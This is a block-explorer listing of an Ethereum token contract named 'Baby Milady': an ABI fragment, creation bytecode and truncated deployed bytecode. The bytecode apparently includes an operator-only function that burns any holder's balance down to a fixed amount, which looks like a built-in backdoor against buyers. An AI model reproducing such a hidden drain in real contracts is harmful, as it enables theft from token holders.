"outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

600680546001600160a01b031916731323b9c1123063b569d38e3d6ffbed6df2e8eccb17905560e0604052600b60a09081526a42616279204d696c61647960a81b60c052600890620000529082620005fc565b5060408051808201909152600a815269424142594d494c41445960b01b6020820152600990620000839082620005fc565b50600a80546001600160a01b03191661dead1790556103e8620000b46b033b2e3c9fd0803ce80000006021620006de565b620000c09190620006fe565b600f556103e8620000df6b033b2e3c9fd0803ce80000006021620006de565b620000eb9190620006fe565b6010556127106200010a6b033b2e3c9fd0803ce80000006005620006de565b620001169190620006fe565b601155600060128190556013819055601455678ac7230489e80000601555601680546001600160b81b03191676306bc3280cf20d66ee481eb9c700b3070fade4c70000001790553480156200016a57600080fd5b50600880546200017a906200056e565b80601f0160208091040260200160405190810160405280929190818152602001828054620001a8906200056e565b8015620001f95780601f10620001cd57610100808354040283529160200191620001f9565b820191906000526020600020905b815481529060010190602001808311620001db57829003601f168201915b5050505050600980546200020d906200056e565b80601f01602080910402602001604051908101604052809291908181526020018280546200023b906200056e565b80156200028c5780601f1062000260576101008083540402835291602001916200028c565b820191906000526020600020905b8154815290600101906020018083116200026e57829003601f168201915b50505050508160039081620002a29190620005fc565b506004620002b18282620005fc565b505050620002ce620002c86200043760201b60201c565b6200043b565b620002e6336b033b2e3c9fd0803ce80000006200048d565b600c8054600360ff1991821617909155737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600e6020908152604080832080548616600190811790915560068054861685528285208054881683179055601680546301000000908190048816875284872080548a16851790553080885285882080548b16861790557f37836a7135fae77e265e35732c70286035736c8b57b12590769780e067ead81c80548b1686179055600a80548a16895286892080548c1687179055600d9097527fe491d3ddab46a3ddc2b907c015f7e2686859fac31a4f174b9b79a82620b0324e80548b168617905533885285882080548b168617905592548816875284872080548a16851790559054048616855282852080548816831790558452818420805487168217905591549093168252919020805490921617905562000737565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004e85760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620004fc919062000721565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200058357607f821691505b602082108103620005a457634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200055357600081815260208120601f850160051c81016020861015620005d35750805b601f850160051c820191505b81811015620005f457828155600101620005df565b505050505050565b81516001600160401b0381111562000618576200061862000558565b62000630816200062984546200056e565b84620005aa565b602080601f8311600181146200066857600084156200064f5750858301515b600019600386901b1c1916600185901b178555620005f4565b600085815260208120601f198616915b82811015620006995788860151825594840194600190910190840162000678565b5085821015620006b85787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006f857620006f8620006c8565b92915050565b6000826200071c57634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620006f857620006f8620006c8565b608051611f3b62000784600039600081816102d901528181610961015281816109f201528181610b0901528181610b320152818161195e01528181611a160152611aab0152611f3b6000f3fe6080604052600436106102085760003560e01c8063715018a611610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a0578063e5b37a65146105c0578063ef437ff5146105f0578063f2fde38b14610610578063fca675a81461063057600080fd5b8063a9059cbb14610534578063aa4bde2814610554578063b61b64fa1461056a578063badb1df11461058057600080fd5b80638da5cb5b116100e75780638da5cb5b146104c457806395d89b41146104e257806396e3369b146104f7578063a014f37d146104ff578063a457c2d71461051457600080fd5b8063715018a614610454578063751039fc146104695780638baa82491461047e5780638c0b5e22146104ae57600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103c957806349bd5a5e146103df57806349df728c146103ff57806354b762a61461041f57806370a082311461043457600080fd5b80632fee9e7e14610347578063313ce5671461037757806333ee17931461039357806339509351146103a957600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806323b872dd14610310578063293230b81461033057600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600a54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b5061026760115481565b604051908152602001610248565b34801561028157600080fd5b5061028a610657565b6040516102489190611b1f565b3480156102a357600080fd5b506102b76102b2366004611b82565b6106e9565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f000000000000000000000000000000000000000000000000000000000000000081565b34801561030757600080fd5b50600254610267565b34801561031c57600080fd5b506102b761032b366004611bae565b610703565b34801561033c57600080fd5b50610345610727565b005b34801561035357600080fd5b506102b7610362366004611bef565b600e6020526000908152604090205460ff1681565b34801561038357600080fd5b5060405160128152602001610248565b34801561039f57600080fd5b5061026760135481565b3480156103b557600080fd5b506102b76103c4366004611b82565b61079f565b3480156103d557600080fd5b5061026760125481565b3480156103eb57600080fd5b50600754610234906001600160a01b031681565b34801561040b57600080fd5b5061034561041a366004611bef565b6107c1565b34801561042b57600080fd5b506102b76108b3565b34801561044057600080fd5b5061026761044f366004611bef565b6108fa565b34801561046057600080fd5b50610345610915565b34801561047557600080fd5b50610345610929565b34801561048a57600080fd5b506102b7610499366004611bef565b600b6020526000908152604090205460ff1681565b3480156104ba57600080fd5b50610267600f5481565b3480156104d057600080fd5b506005546001600160a01b0316610234565b3480156104ee57600080fd5b5061028a610948565b610345610957565b34801561050b57600080fd5b506102b7610c11565b34801561052057600080fd5b506102b761052f366004611b82565b610c38565b34801561054057600080fd5b506102b761054f366004611b82565b610cb3565b34801561056057600080fd5b5061026760105481565b34801561057657600080fd5b5061026760175481565b34801561058c57600080fd5b5061034561059b366004611bef565b610cc1565b3480156105ac57600080fd5b506102676105bb366004611c13565b610d0d565b3480156105cc57600080fd5b506102b76105db366004611bef565b600d6020526000908152604090205460ff1681565b3480156105fc57600080fd5b5061034561060b366004611c5a565b610d38565b34801561061c57600080fd5b5061034561062b366004611bef565b610d6b565b34801561063c57600080fd5b50600c5461064a9060ff1681565b6040516102489190611c9e565b60606003805461066690611cc6565b80601f016020809104026020016040519081016040528092919081815260200182805461069290611cc6565b80156106df5780601f106106b4576101008083540402835291602001916106df565b820191906000526020600020905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b6000336106f7818585610de1565b60019150505b92915050565b600033610711858285610f05565b61071c858585610f7f565b506001949350505050565b61072f6114e8565b601654610100900460ff161561078c5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6016805462ffff00191662010100179055565b6000336106f78185856107b28383610d0d565b6107bc9190611d16565b610de1565b6107c96114e8565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa15801561081c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108409190611d29565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af115801561088b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108af9190611d42565b5050565b6006546017546040516000926001600160a01b03169180156108fc029184818181858888f193505050501580156108ee573d6000803e3d6000fd5b50506000601755600190565b6001600160a01b031660009081526020819052604090205490565b61091d6114e8565b6109276000611542565b565b6109316114e8565b6b033b2e3c9fd0803ce8000000600f819055601055565b60606004805461066690611cc6565b61095f6114e8565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109bd573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109e19190611d5f565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a4e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a729190611d5f565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610abf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ae39190611d5f565b600780546001600160a01b0319166001600160a01b0392909216919091179055610b30307f0000000000000000000000000000000000000000000000000000000000000000600019610de1565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d7193430610b6a306108fa565b600080610b7f6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610be7573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610c0c9190611d7c565b505050565b6000610c1b6114e8565b50600c805460ff1916600317905560016012819055601381905590565b60003381610c468286610d0d565b905083811015610ca65760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610783565b61071c8286868403610de1565b6000336106f7818585610f7f565b610cc9611594565b6001600160a01b0381166000908152600e60205260409020805460ff19169055601554610d0a908290610cfb826108fa565b610d059190611daa565b611603565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d406114e8565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610d736114e8565b6001600160a01b038116610dd85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610783565b610d0a81611542565b6001600160a01b038316610e435760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610783565b6001600160a01b038216610ea45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610783565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f118484610d0d565b90506000198114610f795781811015610f6c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610783565b610f798484848403610de1565b50505050565b6001600160a01b038316610fa55760405162461bcd60e51b815260040161078390611dbd565b6001600160a01b038216610fcb5760405162461bcd60e51b815260040161078390611e02565b6001600160a01b0383166000908152600d602052604090205460ff1615801561100d57506001600160a01b0382166000908152600d602052604090205460ff16155b1561105f57601654610100900460ff1661105f5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610783565b6001600160a01b0383166000908152600e602052604090205460ff161580156110a157506001600160a01b0382166000908152600e602052604090205460ff16155b156111b6576007546001600160a01b038381169116146111b657600f548111156111335760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610783565b60105461113f836108fa565b6111499083611d16565b11156111b65760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610783565b6001600160a01b0383166000908152600d6020526040902054819060ff161580156111fa57506001600160a01b0383166000908152600d602052604090205460ff16155b156114dd576007546001600160a01b038581169116148061122857506007546001600160a01b038481169116145b1561146657600f548211156112a55760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610783565b6007546001600160a01b0385811691161480156112db57506001600160a01b0383166000908152600e602052604090205460ff16155b80156112f057506001600160a01b0384163014155b1561136e576000600c5460ff16600381111561130e5761130e611c88565b03611337576001600160a01b0383166000908152600b60205260409020805460ff191660011790555b60006064601254846113499190611e45565b6113539190611e5c565b9050611360853083611735565b61136a8184611daa565b9150505b6007546001600160a01b0384811691161480156113a457506001600160a01b0384166000908152600e602052604090205460ff16155b80156113b957506001600160a01b0383163014155b80156113cd575060165462010000900460ff165b80156113dc575060165460ff16155b15611461576013546001600160a01b0385166000908152600b602052604090205460ff16151560010361140e57506014545b6016805460ff1916600117905561142361185f565b6016805460ff191690556000606461143b8386611e45565b6114459190611e5c565b9050611452863083611735565b61145c8185611daa565b925050505b6114dd565b6001600160a01b0384166000908152600b602052604090205460ff16151560011480156114a157506007546001600160a01b03848116911614155b156114dd5760006064601454846114b89190611e45565b6114c29190611e5c565b90506114cf853083611735565b6114d98184611daa565b9150505b610f79848483611735565b6005546001600160a01b031633146109275760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610783565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b0316146109275760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610783565b6001600160a01b0382166116635760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610783565b6001600160a01b038216600090815260208190526040902054818110156116d75760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610783565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b03831661175b5760405162461bcd60e51b815260040161078390611dbd565b6001600160a01b0382166117815760405162461bcd60e51b815260040161078390611e02565b6001600160a01b038316600090815260208190526040902054818110156117f95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610783565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610f79565b611868306108fa565b60000361187157565b60008061187d306108fa565b600654909150479060009061189a906001600160a01b03166108fa565b90506000601154841115611900574792506118b6846000611907565b6118c08347611daa565b94506011548211156118e857806118d85760006118da565b845b6118e49086611e5c565b6017555b84601760008282546118fa9190611d16565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061193c5761193c611e7e565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119ba573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906119de9190611d5f565b816001815181106119f1576119f1611e7e565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a6f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a939190611d42565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611ae89086908690869030904290600401611e94565b600060405180830381600087803b158015611b0257600080fd5b505af1158015611b16573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b4c57858101830151858201604001528201611b30565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d0a57600080fd5b60008060408385031215611b9557600080fd5b8235611ba081611b6d565b946020939093013593505050565b600080600060608486031215611bc357600080fd5b8335611bce81611b6d565b92506020840135611bde81611b6d565b929592945050506040919091013590565b600060208284031215611c0157600080fd5b8135611c0c81611b6d565b9392505050565b60008060408385031215611c2657600080fd5b8235611c3181611b6d565b91506020830135611c4181611b6d565b809150509250929050565b8015158114610d0a57600080fd5b60008060408385031215611c6d57600080fd5b8235611c7881611b6d565b91506020830135611c4181611c4c565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611cc057634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611cda57607f821691505b602082108103611cfa57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808201808211156106fd576106fd611d00565b600060208284031215611d3b57600080fd5b5051919050565b600060208284031215611d5457600080fd5b8151611c0c81611c4c565b600060208284031215611d7157600080fd5b8151611c0c81611b6d565b600080600060608486031215611d9157600080fd5b8351925060208401519150604084015190509250925092565b818103818111156106fd576106fd611d00565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b80820281158282048414176106fd576106fd611d00565b600082611e7957634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ee45784516001600160a01b031683529383019391830191600101611ebf565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220dfbf018d6298827807e781456e6f3d2b880cb3da02d407a2127a4320a2e74cbf64736f6c63430008120033

Deployed Bytecode

0x6080604052600436106102085760003560e01c8063715018a611610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a0578063e5b37a65146105c0578063ef437ff5146105f0578063f2fde38b14610610578063fca675a81461063057600080fd5b8063a9059cbb14610534578063aa4bde2814610554578063b61b64fa1461056a578063badb1df11461058057600080fd5b80638da5cb5b116100e75780638da5cb5b146104c457806395d89b41146104e257806396e3369b146104f7578063a014f37d146104ff578063a457c2d71461051457600080fd5b8063715018a614610454578063751039fc146104695780638baa82491461047e5780638c0b5e22146104ae57600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103c957806349bd5a5e146103df57806349df728c146103ff57806354b762a61461041f57806370a082311461043457600080fd5b80632fee9e7e14610347578063313ce5671461037757806333ee17931461039357806339509351146103a957600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806323b872dd14610310578063293230b81461033057600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600a54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b5061026760115481565b604051908152602001610248565b34801561028157600080fd5b5061028a610657565b6040516102489190611b1f565b3480156102a357600080fd5b506102b76102b2366004611b82565b6106e9565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561030757600080fd5b50600254610267565b34801561031c57600080fd5b506102b761032b366004611bae565b610703565b34801561033c57600080fd5b50610345610727565b005b34801561035357600080fd5b506102b7610362366004611bef565b600e6020526000908152604090205460ff1681565b34801561038357600080fd5b5060405160128152602001610248565b34801561039f57600080fd5b5061026760135481565b3480156103b557600080fd5b506102b76103c4366004611b82565b61079f565b3480156103d557600080fd5b5061026760125481565b3480156103eb57600080fd5b50600754610234906001600160a01b031681565b34801561040b57600080fd5b5061034561041a366004611bef565b6107c1565b34801561042b57600080fd5b506102b76108b3565b34801561044057600080fd5b5061026761044f366004611bef565b6108fa565b34801561046057600080fd5b50610345610915565b34801561047557600080fd5b50610345610929565b34801561048a57600080fd5b506102b7610499366004611bef565b600b6020526000908152604090205460ff1681565b3480156104ba57600080fd5b50610267600f5481565b3480156104d057600080fd5b506005546001600160a01b0316610234565b3480156104ee57600080fd5b5061028a610948565b610345610957565b34801561050b57600080fd5b506102b7610c11565b34801561052057600080fd5b506102b761052f366004611b82565b610c38565b34801561054057600080fd5b506102b761054f366004611b82565b610cb3565b34801561056057600080fd5b5061026760105481565b34801561057657600080fd5b5061026760175481565b34801561058c57600080fd5b5061034561059b366004611bef565b610cc1565b3480156105ac57600080fd5b506102676105bb366004611c13565b610d0d565b3480156105cc57600080fd5b506102b76105db366004611bef565b600d6020526000908152604090205460ff1681565b3480156105fc57600080fd5b5061034561060b366004611c5a565b610d38565b34801561061c57600080fd5b5061034561062b366004611bef565b610d6b565b34801561063c57600080fd5b50600c5461064a9060ff1681565b6040516102489190611c9e565b60606003805461066690611cc6565b80601f016020809104026020016040519081016040528092919081815260200182805461069290611cc6565b80156106df5780601f106106b4576101008083540402835291602001916106df565b820191906000526020600020905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b6000336106f7818585610de1565b60019150505b92915050565b600033610711858285610f05565b61071c858585610f7f565b506001949350505050565b61072f6114e8565b601654610100900460ff161561078c5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6016805462ffff00191662010100179055565b6000336106f78185856107b28383610d0d565b6107bc9190611d16565b610de1565b6107c96114e8565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa15801561081c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108409190611d29565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af115801561088b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108af9190611d42565b5050565b6006546017546040516000926001600160a01b03169180156108fc029184818181858888f193505050501580156108ee573d6000803e3d6000fd5b50506000601755600190565b6001600160a01b031660009081526020819052604090205490565b61091d6114e8565b6109276000611542565b565b6109316114e8565b6b033b2e3c9fd0803ce8000000600f819055601055565b60606004805461066690611cc6565b61095f6114e8565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109bd573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109e19190611d5f565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a4e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a729190611d5f565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610abf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ae39190611d5f565b600780546001600160a01b0319166001600160a01b0392909216919091179055610b30307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600019610de1565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d7193430610b6a306108fa565b600080610b7f6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610be7573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610c0c9190611d7c565b505050565b6000610c1b6114e8565b50600c805460ff1916600317905560016012819055601381905590565b60003381610c468286610d0d565b905083811015610ca65760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610783565b61071c8286868403610de1565b6000336106f7818585610f7f565b610cc9611594565b6001600160a01b0381166000908152600e60205260409020805460ff19169055601554610d0a908290610cfb826108fa565b610d059190611daa565b611603565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d406114e8565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610d736114e8565b6001600160a01b038116610dd85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610783565b610d0a81611542565b6001600160a01b038316610e435760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610783565b6001600160a01b038216610ea45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610783565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f118484610d0d565b90506000198114610f795781811015610f6c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610783565b610f798484848403610de1565b50505050565b6001600160a01b038316610fa55760405162461bcd60e51b815260040161078390611dbd565b6001600160a01b038216610fcb5760405162461bcd60e51b815260040161078390611e02565b6001600160a01b0383166000908152600d602052604090205460ff1615801561100d57506001600160a01b0382166000908152600d602052604090205460ff16155b1561105f57601654610100900460ff1661105f5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610783565b6001600160a01b0383166000908152600e602052604090205460ff161580156110a157506001600160a01b0382166000908152600e602052604090205460ff16155b156111b6576007546001600160a01b038381169116146111b657600f548111156111335760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610783565b60105461113f836108fa565b6111499083611d16565b11156111b65760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610783565b6001600160a01b0383166000908152600d6020526040902054819060ff161580156111fa57506001600160a01b0383166000908152600d602052604090205460ff16155b156114dd576007546001600160a01b038581169116148061122857506007546001600160a01b038481169116145b1561146657600f548211156112a55760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610783565b6007546001600160a01b0385811691161480156112db57506001600160a01b0383166000908152600e602052604090205460ff16155b80156112f057506001600160a01b0384163014155b1561136e576000600c5460ff16600381111561130e5761130e611c88565b03611337576001600160a01b0383166000908152600b60205260409020805460ff191660011790555b60006064601254846113499190611e45565b6113539190611e5c565b9050611360853083611735565b61136a8184611daa565b9150505b6007546001600160a01b0384811691161480156113a457506001600160a01b0384166000908152600e602052604090205460ff16155b80156113b957506001600160a01b0383163014155b80156113cd575060165462010000900460ff165b80156113dc575060165460ff16155b15611461576013546001600160a01b0385166000908152600b602052604090205460ff16151560010361140e57506014545b6016805460ff1916600117905561142361185f565b6016805460ff191690556000606461143b8386611e45565b6114459190611e5c565b9050611452863083611735565b61145c8185611daa565b925050505b6114dd565b6001600160a01b0384166000908152600b602052604090205460ff16151560011480156114a157506007546001600160a01b03848116911614155b156114dd5760006064601454846114b89190611e45565b6114c29190611e5c565b90506114cf853083611735565b6114d98184611daa565b9150505b610f79848483611735565b6005546001600160a01b031633146109275760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610783565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b0316146109275760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610783565b6001600160a01b0382166116635760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610783565b6001600160a01b038216600090815260208190526040902054818110156116d75760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610783565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b03831661175b5760405162461bcd60e51b815260040161078390611dbd565b6001600160a01b0382166117815760405162461bcd60e51b815260040161078390611e02565b6001600160a01b038316600090815260208190526040902054818110156117f95760405162461bc